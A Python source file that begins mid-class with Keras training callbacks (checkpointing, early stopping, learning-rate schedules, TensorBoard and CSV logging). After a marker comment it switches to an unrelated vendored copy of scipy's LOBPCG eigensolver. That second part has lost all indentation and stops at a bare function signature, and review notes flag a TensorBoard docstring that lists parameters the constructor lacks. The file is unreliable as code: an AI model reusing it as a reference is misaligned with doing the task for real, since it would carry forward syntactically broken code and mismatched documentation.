        # Weight by batch size so the epoch average is sample-exact.
        self.totals[metric] = self.totals.get(metric, 0) + value * batch_size

  def on_epoch_end(self, epoch, logs=None):
    if logs is not None:
      for metric in self.params['metrics']:
        if metric in self.totals:
          # Make value available to next callbacks.
          if metric in self.stateful_metrics:
            logs[metric] = self.totals[metric]
          else:
            logs[metric] = self.totals[metric] / self.seen
@tf_export('keras.callbacks.TerminateOnNaN')
class TerminateOnNaN(Callback):
  """Callback that terminates training when a NaN loss is encountered.
  """

  def on_batch_end(self, batch, logs=None):
    logs = logs or {}
    loss = logs.get('loss')
    if loss is None:
      return
    # Stop on NaN or infinite loss values.
    if np.isnan(loss) or np.isinf(loss):
      print('Batch %d: Invalid loss, terminating training' % (batch))
      self.model.stop_training = True
@tf_export('keras.callbacks.ProgbarLogger')
class ProgbarLogger(Callback):
  """Callback that prints metrics to stdout.

  Arguments:
      count_mode: One of "steps" or "samples".
          Whether the progress bar should
          count samples seen or steps (batches) seen.
      stateful_metrics: Iterable of string names of metrics that
          should *not* be averaged over an epoch.
          Metrics in this list will be logged as-is.
          All others will be averaged over time (e.g. loss, etc).

  Raises:
      ValueError: In case of invalid `count_mode`.
  """

  def __init__(self, count_mode='samples', stateful_metrics=None):
    super(ProgbarLogger, self).__init__()
    # Translate count_mode into a boolean consulted on every batch.
    if count_mode == 'samples':
      self.use_steps = False
    elif count_mode == 'steps':
      self.use_steps = True
    else:
      raise ValueError('Unknown `count_mode`: ' + str(count_mode))
    self.stateful_metrics = set(stateful_metrics or [])

  def on_train_begin(self, logs=None):
    # Verbosity and epoch count come from the params set by the trainer.
    self.verbose = self.params['verbose']
    self.epochs = self.params['epochs']

  def on_epoch_begin(self, epoch, logs=None):
    if self.verbose:
      print('Epoch %d/%d' % (epoch + 1, self.epochs))
      # Target is the total step or sample count for this epoch.
      # NOTE(review): params['steps'] may be None in steps mode, which
      # would make the `<` comparisons below fail on Python 3 — confirm.
      if self.use_steps:
        target = self.params['steps']
      else:
        target = self.params['samples']
      self.target = target
      self.progbar = Progbar(
          target=self.target,
          verbose=self.verbose,
          stateful_metrics=self.stateful_metrics)
    self.seen = 0

  def on_batch_begin(self, batch, logs=None):
    # Start a fresh list of values to display for this batch.
    if self.seen < self.target:
      self.log_values = []

  def on_batch_end(self, batch, logs=None):
    logs = logs or {}
    batch_size = logs.get('size', 0)
    # Progress is counted either in batches or in samples.
    if self.use_steps:
      self.seen += 1
    else:
      self.seen += batch_size

    for k in self.params['metrics']:
      if k in logs:
        self.log_values.append((k, logs[k]))

    # Skip progbar update for the last batch;
    # will be handled by on_epoch_end.
    if self.verbose and self.seen < self.target:
      self.progbar.update(self.seen, self.log_values)

  def on_epoch_end(self, epoch, logs=None):
    logs = logs or {}
    for k in self.params['metrics']:
      if k in logs:
        self.log_values.append((k, logs[k]))
    # Final update closes out the progress bar for the epoch.
    if self.verbose:
      self.progbar.update(self.seen, self.log_values)
@tf_export('keras.callbacks.History')
class History(Callback):
  """Callback that records events into a `History` object.

  Applied automatically to every Keras model; the `fit` method of
  models returns this `History` object.
  """

  def on_train_begin(self, logs=None):
    # Start with a clean record on (re)training.
    self.epoch = []
    self.history = {}

  def on_epoch_end(self, epoch, logs=None):
    logs = logs or {}
    self.epoch.append(epoch)
    # Append each logged metric value under its name.
    for metric, value in logs.items():
      self.history.setdefault(metric, []).append(value)
@tf_export('keras.callbacks.ModelCheckpoint')
class ModelCheckpoint(Callback):
  """Save the model after every epoch.

  `filepath` can contain named formatting options,
  which will be filled the value of `epoch` and
  keys in `logs` (passed in `on_epoch_end`).

  For example: if `filepath` is `weights.{epoch:02d}-{val_loss:.2f}.hdf5`,
  then the model checkpoints will be saved with the epoch number and
  the validation loss in the filename.

  Arguments:
      filepath: string, path to save the model file.
      monitor: quantity to monitor.
      verbose: verbosity mode, 0 or 1.
      save_best_only: if `save_best_only=True`,
          the latest best model according to
          the quantity monitored will not be overwritten.
      mode: one of {auto, min, max}.
          If `save_best_only=True`, the decision
          to overwrite the current save file is made
          based on either the maximization or the
          minimization of the monitored quantity. For `val_acc`,
          this should be `max`, for `val_loss` this should
          be `min`, etc. In `auto` mode, the direction is
          automatically inferred from the name of the monitored quantity.
      save_weights_only: if True, then only the model's weights will be
          saved (`model.save_weights(filepath)`), else the full model
          is saved (`model.save(filepath)`).
      period: Interval (number of epochs) between checkpoints.
  """

  def __init__(self,
               filepath,
               monitor='val_loss',
               verbose=0,
               save_best_only=False,
               save_weights_only=False,
               mode='auto',
               period=1):
    super(ModelCheckpoint, self).__init__()
    self.monitor = monitor
    self.verbose = verbose
    self.filepath = filepath
    self.save_best_only = save_best_only
    self.save_weights_only = save_weights_only
    self.period = period
    self.epochs_since_last_save = 0

    # Unknown modes fall back to 'auto' with a warning rather than failing.
    if mode not in ['auto', 'min', 'max']:
      logging.warning('ModelCheckpoint mode %s is unknown, '
                      'fallback to auto mode.', mode)
      mode = 'auto'

    # monitor_op decides whether "current" beats "best"; "best" starts at
    # the worst possible value for the chosen direction.
    if mode == 'min':
      self.monitor_op = np.less
      self.best = np.Inf
    elif mode == 'max':
      self.monitor_op = np.greater
      self.best = -np.Inf
    else:
      # 'auto': accuracy-like metrics are maximized, others minimized.
      if 'acc' in self.monitor or self.monitor.startswith('fmeasure'):
        self.monitor_op = np.greater
        self.best = -np.Inf
      else:
        self.monitor_op = np.less
        self.best = np.Inf

  def on_epoch_end(self, epoch, logs=None):
    logs = logs or {}
    self.epochs_since_last_save += 1
    # Only checkpoint every `period` epochs.
    if self.epochs_since_last_save >= self.period:
      self.epochs_since_last_save = 0
      # Epoch number and logged metrics may be interpolated into the path.
      filepath = self.filepath.format(epoch=epoch + 1, **logs)
      if self.save_best_only:
        current = logs.get(self.monitor)
        if current is None:
          logging.warning('Can save best model only with %s available, '
                          'skipping.', self.monitor)
        else:
          if self.monitor_op(current, self.best):
            if self.verbose > 0:
              print('\nEpoch %05d: %s improved from %0.5f to %0.5f,'
                    ' saving model to %s' % (epoch + 1, self.monitor, self.best,
                                             current, filepath))
            self.best = current
            if self.save_weights_only:
              self.model.save_weights(filepath, overwrite=True)
            else:
              self.model.save(filepath, overwrite=True)
          else:
            if self.verbose > 0:
              print('\nEpoch %05d: %s did not improve from %0.5f' %
                    (epoch + 1, self.monitor, self.best))
      else:
        # Unconditional periodic save.
        if self.verbose > 0:
          print('\nEpoch %05d: saving model to %s' % (epoch + 1, filepath))
        if self.save_weights_only:
          self.model.save_weights(filepath, overwrite=True)
        else:
          self.model.save(filepath, overwrite=True)
@tf_export('keras.callbacks.EarlyStopping')
class EarlyStopping(Callback):
  """Stop training when a monitored quantity has stopped improving.

  Arguments:
      monitor: quantity to be monitored.
      min_delta: minimum change in the monitored quantity
          to qualify as an improvement, i.e. an absolute
          change of less than min_delta, will count as no
          improvement.
      patience: number of epochs with no improvement
          after which training will be stopped.
      verbose: verbosity mode.
      mode: one of {auto, min, max}. In `min` mode,
          training will stop when the quantity
          monitored has stopped decreasing; in `max`
          mode it will stop when the quantity
          monitored has stopped increasing; in `auto`
          mode, the direction is automatically inferred
          from the name of the monitored quantity.
      baseline: baseline value for the monitored quantity.
          Training will stop if the model doesn't show improvement over the
          baseline.
  """

  def __init__(self,
               monitor='val_loss',
               min_delta=0,
               patience=0,
               verbose=0,
               mode='auto',
               baseline=None):
    super(EarlyStopping, self).__init__()

    self.monitor = monitor
    self.patience = patience
    self.verbose = verbose
    self.baseline = baseline
    self.min_delta = abs(min_delta)
    self.wait = 0
    self.stopped_epoch = 0

    # Unknown modes fall back to 'auto' with a warning rather than failing.
    if mode not in ['auto', 'min', 'max']:
      logging.warning('EarlyStopping mode %s is unknown, '
                      'fallback to auto mode.', mode)
      mode = 'auto'

    if mode == 'min':
      self.monitor_op = np.less
    elif mode == 'max':
      self.monitor_op = np.greater
    else:
      # 'auto': accuracy-like metrics are maximized, others minimized.
      if 'acc' in self.monitor:
        self.monitor_op = np.greater
      else:
        self.monitor_op = np.less

    # Orient min_delta toward the direction of improvement: positive when
    # larger is better, negative when smaller is better (the *= 1 branch
    # is a no-op kept for symmetry).
    if self.monitor_op == np.greater:
      self.min_delta *= 1
    else:
      self.min_delta *= -1

  def on_train_begin(self, logs=None):
    # Allow instances to be re-used
    self.wait = 0
    self.stopped_epoch = 0
    if self.baseline is not None:
      self.best = self.baseline
    else:
      # Start from the worst possible value for the chosen direction.
      self.best = np.Inf if self.monitor_op == np.less else -np.Inf

  def on_epoch_end(self, epoch, logs=None):
    # NOTE(review): assumes `logs` is always a dict here — confirm callers.
    current = logs.get(self.monitor)
    if current is None:
      logging.warning('Early stopping conditioned on metric `%s` '
                      'which is not available. Available metrics are: %s',
                      self.monitor, ','.join(list(logs.keys())))
      return
    # An epoch counts as improvement only if it beats best by min_delta.
    if self.monitor_op(current - self.min_delta, self.best):
      self.best = current
      self.wait = 0
    else:
      self.wait += 1
      if self.wait >= self.patience:
        self.stopped_epoch = epoch
        self.model.stop_training = True

  def on_train_end(self, logs=None):
    if self.stopped_epoch > 0 and self.verbose > 0:
      print('Epoch %05d: early stopping' % (self.stopped_epoch + 1))
@tf_export('keras.callbacks.RemoteMonitor')
class RemoteMonitor(Callback):
    """Stream epoch-end events to a remote server.

    Requires the `requests` library. Events are sent to
    `root + '/publish/epoch/end/'` by default via HTTP POST, with a `data`
    argument which is a JSON-encoded dictionary of event data. If
    `send_as_json` is True the content type of the request is
    application/json; otherwise the serialized JSON is sent within a form.

    Arguments:
        root: String; root url of the target server.
        path: String; path relative to `root` to which the events will be
            sent.
        field: String; JSON field under which the data will be stored.
            Only used if the payload is sent within a form
            (i.e. send_as_json is set to False).
        headers: Dictionary; optional custom HTTP headers.
        send_as_json: Boolean; whether the request should be sent as
            application/json.
    """

    def __init__(self,
                 root='http://localhost:9000',
                 path='/publish/epoch/end/',
                 field='data',
                 headers=None,
                 send_as_json=False):
        super(RemoteMonitor, self).__init__()
        self.root = root
        self.path = path
        self.field = field
        self.headers = headers
        self.send_as_json = send_as_json

    def on_epoch_end(self, epoch, logs=None):
        if requests is None:
            raise ImportError('RemoteMonitor requires the `requests` library.')
        # Merge the epoch index with this epoch's metric values; a
        # conflicting 'epoch' key in logs wins, as before.
        send = {'epoch': epoch}
        send.update(logs or {})
        target = self.root + self.path
        try:
            if self.send_as_json:
                requests.post(target, json=send, headers=self.headers)
            else:
                requests.post(target, {self.field: json.dumps(send)},
                              headers=self.headers)
        except requests.exceptions.RequestException:
            # Best-effort delivery: an unreachable server must not abort
            # training.
            logging.warning('Warning: could not reach RemoteMonitor '
                            'root server at ' + str(self.root))
@tf_export('keras.callbacks.LearningRateScheduler')
class LearningRateScheduler(Callback):
    """Learning rate scheduler.

    Arguments:
        schedule: a function that takes an epoch index as input
            (integer, indexed from 0) and returns a new
            learning rate as output (float).
        verbose: int. 0: quiet, 1: update messages.
    """

    def __init__(self, schedule, verbose=0):
        super(LearningRateScheduler, self).__init__()
        self.schedule = schedule
        self.verbose = verbose

    def on_epoch_begin(self, epoch, logs=None):
        if not hasattr(self.model.optimizer, 'lr'):
            raise ValueError('Optimizer must have a "lr" attribute.')
        try:
            # New-style schedules also receive the current learning rate.
            current_lr = float(K.get_value(self.model.optimizer.lr))
            lr = self.schedule(epoch, current_lr)
        except TypeError:
            # Old API took only the epoch index; kept for compatibility.
            lr = self.schedule(epoch)
        if not isinstance(lr, (float, np.float32, np.float64)):
            raise ValueError('The output of the "schedule" function '
                             'should be float.')
        K.set_value(self.model.optimizer.lr, lr)
        if self.verbose > 0:
            print('\nEpoch %05d: LearningRateScheduler reducing learning '
                  'rate to %s.' % (epoch + 1, lr))
@tf_export('keras.callbacks.TensorBoard')
class TensorBoard(Callback):
    # pylint: disable=line-too-long
    """Tensorboard basic visualizations.
    This callback writes a log for TensorBoard, which allows
    you to visualize dynamic graphs of your training and test
    metrics, as well as activation histograms for the different
    layers in your model.
    TensorBoard is a visualization tool provided with TensorFlow.
    If you have installed TensorFlow with pip, you should be able
    to launch TensorBoard from the command line:
    ```sh
    tensorboard --logdir=/full_path_to_your_logs
    ```
    You can find more information about TensorBoard
    [here](https://www.tensorflow.org/get_started/summaries_and_tensorboard).
    Arguments:
        log_dir: the path of the directory where to save the log
            files to be parsed by TensorBoard.
        histogram_freq: frequency (in epochs) at which to compute activation
            and weight histograms for the layers of the model. If set to 0,
            histograms won't be computed. Validation data (or split) must be
            specified for histogram visualizations.
        write_graph: whether to visualize the graph in TensorBoard.
            The log file can become quite large when
            write_graph is set to True.
        write_grads: whether to visualize gradient histograms in TensorBoard.
            `histogram_freq` must be greater than 0.
        batch_size: size of batch of inputs to feed to the network
            for histograms computation.
        write_images: whether to write model weights to visualize as
            image in TensorBoard.
        embeddings_freq: frequency (in epochs) at which selected embedding
            layers will be saved.
        embeddings_layer_names: a list of names of layers to keep eye on. If
            None or empty list all the embedding layer will be watched.
        embeddings_metadata: a dictionary which maps layer name to a file name
            in which metadata for this embedding layer is saved. See the
            [details](https://www.tensorflow.org/how_tos/embedding_viz/#metadata_optional)
            about metadata files format. In case if the same metadata file is
            used for all embedding layers, string can be passed.
    """
    # pylint: enable=line-too-long

    # NOTE(review): the docstring documents embeddings_freq /
    # embeddings_layer_names / embeddings_metadata, but __init__ accepts no
    # such parameters — presumably the docstring was copied from a fuller
    # implementation; confirm against the upstream version this was taken from.
    def __init__(self,
                 log_dir='./logs',
                 histogram_freq=0,
                 batch_size=32,
                 write_graph=True,
                 write_grads=False,
                 write_images=False):
        super(TensorBoard, self).__init__()
        self.log_dir = log_dir
        self.histogram_freq = histogram_freq
        # Merged summary op; built lazily on the first `set_model` call.
        self.merged = None
        self.write_graph = write_graph
        self.write_grads = write_grads
        self.write_images = write_images
        self.batch_size = batch_size
        # Index of the current validation batch within the running epoch.
        self._current_batch = 0
        # abstracted writer class to be able to stub for testing
        self._writer_class = tf_summary.FileWriter

    def set_model(self, model):
        """Sets Keras model and creates summary ops."""
        self.model = model
        self.sess = K.get_session()
        # Build histogram/image/gradient summaries once per model.
        if self.histogram_freq and self.merged is None:
            for layer in self.model.layers:
                for weight in layer.weights:
                    # Summary tags may not contain ':' (names look like
                    # 'dense/kernel:0').
                    mapped_weight_name = weight.name.replace(':', '_')
                    tf_summary.histogram(mapped_weight_name, weight)
                    if self.write_images:
                        # Reshape the weight tensor into a 4-D
                        # [batch, height, width, channels] image summary.
                        w_img = array_ops.squeeze(weight)
                        shape = K.int_shape(w_img)
                        if len(shape) == 2:  # dense layer kernel case
                            if shape[0] > shape[1]:
                                w_img = array_ops.transpose(w_img)
                                shape = K.int_shape(w_img)
                            w_img = array_ops.reshape(
                                w_img, [1, shape[0], shape[1], 1])
                        elif len(shape) == 3:  # convnet case
                            if K.image_data_format() == 'channels_last':
                                # switch to channels_first to display
                                # every kernel as a separate image
                                w_img = array_ops.transpose(w_img, perm=[2, 0, 1])
                                shape = K.int_shape(w_img)
                            w_img = array_ops.reshape(
                                w_img, [shape[0], shape[1], shape[2], 1])
                        elif len(shape) == 1:  # bias case
                            w_img = array_ops.reshape(w_img, [1, shape[0], 1, 1])
                        else:
                            # not possible to handle 3D convnets etc.
                            continue

                        shape = K.int_shape(w_img)
                        # Image summaries require 4-D with 1, 3 or 4 channels.
                        assert len(shape) == 4 and shape[-1] in [1, 3, 4]
                        tf_summary.image(mapped_weight_name, w_img)

                if self.write_grads:
                    for weight in layer.trainable_weights:
                        mapped_weight_name = weight.name.replace(':', '_')
                        grads = model.optimizer.get_gradients(
                            model.total_loss, weight)

                        def is_indexed_slices(grad):
                            return type(grad).__name__ == 'IndexedSlices'

                        # Sparse gradients arrive as IndexedSlices; histogram
                        # only their dense `values` component.
                        grads = [grad.values if is_indexed_slices(grad) else grad
                                 for grad in grads]
                        tf_summary.histogram(
                            '{}_grad'.format(mapped_weight_name), grads)

                if hasattr(layer, 'output'):
                    tf_summary.histogram('{}_out'.format(layer.name),
                                         layer.output)
        self.merged = tf_summary.merge_all()

        if self.write_graph:
            self.writer = self._writer_class(self.log_dir, self.sess.graph)
        else:
            self.writer = self._writer_class(self.log_dir)

    def _fetch_callback(self, summary):
        # Record validation-batch summaries at a fractional "step" so the
        # batches of one epoch are spread between consecutive epoch ticks.
        self.writer.add_summary(
            summary, self._epoch + self._current_batch / self._batches_per_epoch)
        self._current_batch += 1

    def on_epoch_begin(self, epoch, logs=None):
        """Add histogram op to Model test_function callbacks, reset batch count."""
        if not self.validation_data and self.histogram_freq:
            raise ValueError('If printing histograms, validation_data must be '
                             'provided, and cannot be a generator.')
        if self.histogram_freq and epoch % self.histogram_freq == 0:
            self._epoch = epoch
            self._current_batch = 0
            self._batches_per_epoch = math.ceil(
                self.validation_data[0].shape[0] / self.batch_size)
            # Piggy-back the merged summary op on the model's evaluation
            # function so it is computed on every validation batch.
            if self.merged not in self.model.test_function.fetches:
                self.model.test_function.fetches.append(self.merged)
                self.model.test_function.fetch_callbacks[
                    self.merged] = self._fetch_callback

    def on_epoch_end(self, epoch, logs=None):
        """Checks if summary ops should run next epoch, logs scalar summaries."""
        logs = logs or {}
        # Detach the histogram fetch between epochs.
        # NOTE(review): the guard is `histogram_freq > 1`, so with a freq of
        # exactly 1 the fetch is never removed — presumably intentional since
        # on_epoch_begin would re-add it every epoch anyway; confirm.
        if self.histogram_freq and self.histogram_freq > 1:
            if self.merged in self.model.test_function.fetches:
                self.model.test_function.fetches.remove(self.merged)
            if self.merged in self.model.test_function.fetch_callbacks:
                self.model.test_function.fetch_callbacks.pop(self.merged)

        # Write every metric in `logs` (except bookkeeping keys) as a
        # scalar summary for this epoch.
        for name, value in logs.items():
            if name in ['batch', 'size']:
                continue
            summary = tf_summary.Summary()
            summary_value = summary.value.add()
            summary_value.simple_value = value.item()
            summary_value.tag = name
            self.writer.add_summary(summary, epoch)
        self.writer.flush()

    def on_train_end(self, logs=None):
        self.writer.close()
@tf_export('keras.callbacks.ReduceLROnPlateau')
class ReduceLROnPlateau(Callback):
    """Reduce learning rate when a metric has stopped improving.

    Models often benefit from reducing the learning rate by a factor
    of 2-10 once learning stagnates. This callback monitors a
    quantity and if no improvement is seen for a 'patience' number
    of epochs, the learning rate is reduced.

    Example:

    ```python
    reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.2,
                                  patience=5, min_lr=0.001)
    model.fit(X_train, Y_train, callbacks=[reduce_lr])
    ```

    Arguments:
        monitor: quantity to be monitored.
        factor: factor by which the learning rate will be reduced.
            new_lr = lr * factor
        patience: number of epochs with no improvement after which
            learning rate will be reduced.
        verbose: int. 0: quiet, 1: update messages.
        mode: one of {auto, min, max}. In `min` mode, lr will be reduced
            when the quantity monitored has stopped decreasing; in `max`
            mode it will be reduced when the quantity monitored has
            stopped increasing; in `auto` mode, the direction is
            automatically inferred from the name of the monitored quantity.
        min_delta: threshold for measuring the new optimum, to only focus
            on significant changes.
        cooldown: number of epochs to wait before resuming normal
            operation after lr has been reduced.
        min_lr: lower bound on the learning rate.
    """

    def __init__(self,
                 monitor='val_loss',
                 factor=0.1,
                 patience=10,
                 verbose=0,
                 mode='auto',
                 min_delta=1e-4,
                 cooldown=0,
                 min_lr=0,
                 **kwargs):
        super(ReduceLROnPlateau, self).__init__()

        self.monitor = monitor
        if factor >= 1.0:
            raise ValueError('ReduceLROnPlateau '
                             'does not support a factor >= 1.0.')
        # `epsilon` is the deprecated spelling of `min_delta`.
        if 'epsilon' in kwargs:
            min_delta = kwargs.pop('epsilon')
            logging.warning('`epsilon` argument is deprecated and '
                            'will be removed, use `min_delta` instead.')
        self.factor = factor
        self.min_lr = min_lr
        self.min_delta = min_delta
        self.patience = patience
        self.verbose = verbose
        self.cooldown = cooldown
        self.cooldown_counter = 0  # Cooldown counter.
        self.wait = 0
        self.best = 0
        self.mode = mode
        self.monitor_op = None
        self._reset()

    def _reset(self):
        """Resets wait counter and cooldown counter.
        """
        if self.mode not in ('auto', 'min', 'max'):
            logging.warning('Learning Rate Plateau Reducing mode %s is unknown, '
                            'fallback to auto mode.', self.mode)
            self.mode = 'auto'
        # 'auto' minimizes unless the metric name suggests an accuracy.
        minimize = (self.mode == 'min' or
                    (self.mode == 'auto' and 'acc' not in self.monitor))
        if minimize:
            self.monitor_op = lambda a, b: np.less(a, b - self.min_delta)
            self.best = np.Inf
        else:
            self.monitor_op = lambda a, b: np.greater(a, b + self.min_delta)
            self.best = -np.Inf
        self.cooldown_counter = 0
        self.wait = 0

    def on_train_begin(self, logs=None):
        self._reset()

    def on_epoch_end(self, epoch, logs=None):
        logs = logs or {}
        # Expose the current learning rate to other callbacks/loggers.
        logs['lr'] = K.get_value(self.model.optimizer.lr)
        current = logs.get(self.monitor)
        if current is None:
            logging.warning('Reduce LR on plateau conditioned on metric `%s` '
                            'which is not available. Available metrics are: %s',
                            self.monitor, ','.join(list(logs.keys())))
            return

        if self.in_cooldown():
            self.cooldown_counter -= 1
            self.wait = 0

        if self.monitor_op(current, self.best):
            self.best = current
            self.wait = 0
        elif not self.in_cooldown():
            self.wait += 1
            if self.wait >= self.patience:
                old_lr = float(K.get_value(self.model.optimizer.lr))
                if old_lr > self.min_lr:
                    # Shrink the lr, but never below the configured floor.
                    new_lr = max(old_lr * self.factor, self.min_lr)
                    K.set_value(self.model.optimizer.lr, new_lr)
                    if self.verbose > 0:
                        print('\nEpoch %05d: ReduceLROnPlateau reducing learning '
                              'rate to %s.' % (epoch + 1, new_lr))
                    self.cooldown_counter = self.cooldown
                    self.wait = 0

    def in_cooldown(self):
        """Whether lr reductions are currently suspended."""
        return self.cooldown_counter > 0
@tf_export('keras.callbacks.CSVLogger')
class CSVLogger(Callback):
    """Callback that streams epoch results to a csv file.

    Supports all values that can be represented as a string,
    including 1D iterables such as np.ndarray.

    Example:

    ```python
    csv_logger = CSVLogger('training.log')
    model.fit(X_train, Y_train, callbacks=[csv_logger])
    ```

    Arguments:
        filename: filename of the csv file, e.g. 'run/log.csv'.
        separator: string used to separate elements in the csv file.
        append: True: append if file exists (useful for continuing
            training). False: overwrite existing file,
    """

    def __init__(self, filename, separator=',', append=False):
        self.sep = separator
        self.filename = filename
        self.append = append
        self.writer = None
        self.keys = None
        self.append_header = True
        # Python 2 on Windows needs binary mode to avoid newline mangling.
        if six.PY2 and os.name == 'nt':
            self.file_flags = 'b'
        else:
            self.file_flags = ''
        super(CSVLogger, self).__init__()

    def on_train_begin(self, logs=None):
        if self.append:
            # Keep any existing rows; only write a header when the file is
            # empty or absent.
            if os.path.exists(self.filename):
                with open(self.filename, 'r' + self.file_flags) as f:
                    self.append_header = not bool(len(f.readline()))
            mode = 'a'
        else:
            mode = 'w'
        self.csv_file = open(self.filename, mode + self.file_flags)

    def on_epoch_end(self, epoch, logs=None):
        logs = logs or {}

        def handle_value(k):
            # Strings pass through; 0-d arrays and scalars are written
            # as-is; any other iterable is rendered as a quoted list.
            if isinstance(k, six.string_types):
                return k
            is_zero_dim_ndarray = isinstance(k, np.ndarray) and k.ndim == 0
            if isinstance(k, Iterable) and not is_zero_dim_ndarray:
                return '"[%s]"' % (', '.join(map(str, k)))
            return k

        if self.keys is None:
            self.keys = sorted(logs.keys())

        if self.model.stop_training:
            # We set NA so that csv parsers do not fail for this last epoch.
            logs = dict((k, logs.get(k, 'NA')) for k in self.keys)

        if not self.writer:

            class CustomDialect(csv.excel):
                delimiter = self.sep

            self.writer = csv.DictWriter(self.csv_file,
                                         fieldnames=['epoch'] + self.keys,
                                         dialect=CustomDialect)
            if self.append_header:
                self.writer.writeheader()

        row_dict = OrderedDict({'epoch': epoch})
        row_dict.update((key, handle_value(logs[key])) for key in self.keys)
        self.writer.writerow(row_dict)
        self.csv_file.flush()

    def on_train_end(self, logs=None):
        self.csv_file.close()
        self.writer = None
@tf_export('keras.callbacks.LambdaCallback')
class LambdaCallback(Callback):
    r"""Callback for creating simple, custom callbacks on-the-fly.

    This callback is constructed with anonymous functions that will be called
    at the appropriate time. Note that the callbacks expects positional
    arguments, as:

    - `on_epoch_begin` and `on_epoch_end` expect two positional arguments:
      `epoch`, `logs`
    - `on_batch_begin` and `on_batch_end` expect two positional arguments:
      `batch`, `logs`
    - `on_train_begin` and `on_train_end` expect one positional argument:
      `logs`

    Arguments:
        on_epoch_begin: called at the beginning of every epoch.
        on_epoch_end: called at the end of every epoch.
        on_batch_begin: called at the beginning of every batch.
        on_batch_end: called at the end of every batch.
        on_train_begin: called at the beginning of model training.
        on_train_end: called at the end of model training.

    Example:

    ```python
    # Print the batch number at the beginning of every batch.
    batch_print_callback = LambdaCallback(
        on_batch_begin=lambda batch,logs: print(batch))

    # Stream the epoch loss to a file in JSON format. The file content
    # is not well-formed JSON but rather has a JSON object per line.
    import json
    json_log = open('loss_log.json', mode='wt', buffering=1)
    json_logging_callback = LambdaCallback(
        on_epoch_end=lambda epoch, logs: json_log.write(
            json.dumps({'epoch': epoch, 'loss': logs['loss']}) + '\n'),
        on_train_end=lambda logs: json_log.close()
    )

    # Terminate some processes after having finished model training.
    processes = ...
    cleanup_callback = LambdaCallback(
        on_train_end=lambda logs: [
            p.terminate() for p in processes if p.is_alive()])

    model.fit(...,
              callbacks=[batch_print_callback,
                         json_logging_callback,
                         cleanup_callback])
    ```
    """

    def __init__(self,
                 on_epoch_begin=None,
                 on_epoch_end=None,
                 on_batch_begin=None,
                 on_batch_end=None,
                 on_train_begin=None,
                 on_train_end=None,
                 **kwargs):
        super(LambdaCallback, self).__init__()
        self.__dict__.update(kwargs)
        # Each hook falls back to a no-op of the matching arity when the
        # caller did not supply one.
        self.on_epoch_begin = (on_epoch_begin if on_epoch_begin is not None
                               else (lambda epoch, logs: None))
        self.on_epoch_end = (on_epoch_end if on_epoch_end is not None
                             else (lambda epoch, logs: None))
        self.on_batch_begin = (on_batch_begin if on_batch_begin is not None
                               else (lambda batch, logs: None))
        self.on_batch_end = (on_batch_end if on_batch_end is not None
                             else (lambda batch, logs: None))
        self.on_train_begin = (on_train_begin if on_train_begin is not None
                               else (lambda logs: None))
        self.on_train_end = (on_train_end if on_train_end is not None
                             else (lambda logs: None))
# --- end of Keras callbacks section; vendored scipy lobpcg copy follows ---
"""
scikit-learn copy of scipy/sparse/linalg/eigen/lobpcg/lobpcg.py v1.7.1
to be deleted after scipy 1.3.0 becomes a dependency in scikit-learn
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Locally Optimal Block Preconditioned Conjugate Gradient Method (LOBPCG).
References
----------
.. [1] A. V. Knyazev (2001),
Toward the Optimal Preconditioned Eigensolver: Locally Optimal
Block Preconditioned Conjugate Gradient Method.
SIAM Journal on Scientific Computing 23, no. 2,
pp. 517-541. :doi:`10.1137/S1064827500366124`
.. [2] A. V. Knyazev, I. Lashuk, M. E. Argentati, and E. Ovchinnikov (2007),
Block Locally Optimal Preconditioned Eigenvalue Xolvers (BLOPEX)
in hypre and PETSc. :arxiv:`0705.2626`
.. [3] A. V. Knyazev's C and MATLAB implementations:
https://github.com/lobpcg/blopex
"""
import numpy as np
from scipy.linalg import (inv, eigh, cho_factor, cho_solve, cholesky,
LinAlgError)
from scipy.sparse.linalg import aslinearoperator
from numpy import block as bmat
__all__ = ['lobpcg']
def _report_nonhermitian(M, name):
"""
Report if `M` is not a Hermitian matrix given its type.
"""
from scipy.linalg import norm
md = M - M.T.conj()
nmd = norm(md, 1)
tol = 10 * np.finfo(M.dtype).eps
tol = max(tol, tol * norm(M, 1))
if nmd > tol:
print('matrix %s of the type %s is not sufficiently Hermitian:'
% (name, M.dtype))
print('condition: %.e < %e' % (nmd, tol))
def _as2d(ar):
"""
If the input array is 2D return it, if it is 1D, append a dimension,
making it a column vector.
"""
if ar.ndim == 2:
return ar
else: # Assume 1!
aux = np.array(ar, copy=False)
aux.shape = (ar.shape[0], 1)
return aux
def _makeOperator(operatorInput, expectedShape):
"""Takes a dense numpy array or a sparse matrix or
a function and makes an operator performing matrix * blockvector
products."""
if operatorInput is None:
return None
else:
operator = aslinearoperator(operatorInput)
if operator.shape != expectedShape:
raise ValueError('operator has invalid shape')
return operator
def _applyConstraints(blockVectorV, factYBY, blockVectorBY, blockVectorY):
"""Changes blockVectorV in place."""
YBV = np.dot(blockVectorBY.T.conj(), blockVectorV)
tmp = cho_solve(factYBY, YBV)
blockVectorV -= np.dot(blockVectorY, tmp)
def _b_orthonormalize(B, blockVectorV, blockVectorBV=None, retInvR=False):
"""B-orthonormalize the given block vector using Cholesky."""
normalization = blockVectorV.max(axis=0)+np.finfo(blockVectorV.dtype).eps
blockVectorV = blockVectorV / normalization
if blockVectorBV is None:
if B is not None:
blockVectorBV = B(blockVectorV)
else:
blockVectorBV = blockVectorV # Shared data!!!
else:
blockVectorBV = blockVectorBV / normalization
VBV = np.matmul(blockVectorV.T.conj(), blockVectorBV)
try:
# VBV is a Cholesky factor from now on...
VBV = cholesky(VBV, overwrite_a=True)
VBV = inv(VBV, overwrite_a=True)
blockVectorV = np.matmul(blockVectorV, VBV)
# blockVectorV = (cho_solve((VBV.T, True), blockVectorV.T)).T
if B is not None:
blockVectorBV = np.matmul(blockVectorBV, VBV)
# blockVectorBV = (cho_solve((VBV.T, True), blockVectorBV.T)).T
else:
blockVectorBV = None
except LinAlgError:
#raise ValueError('Cholesky has failed')
blockVectorV = None
blockVectorBV = None
VBV = None
if retInvR:
return blockVectorV, blockVectorBV, VBV, normalization
else:
return blockVectorV, blockVectorBV
def _get_indx(_lambda, num, largest):
"""Get `num` indices into `_lambda` depending on `largest` option."""
ii = np.argsort(_lambda)
if largest:
ii = ii[:-num-1:-1]
else:
ii = ii[:num]
return ii
def lobpcg(A, X,
B=None, M=None, Y=None,
tol=None, maxiter=None,
largest=True, verbosityLevel=0,
retLambdaHistory=False, retResidualNormsHistory=False):
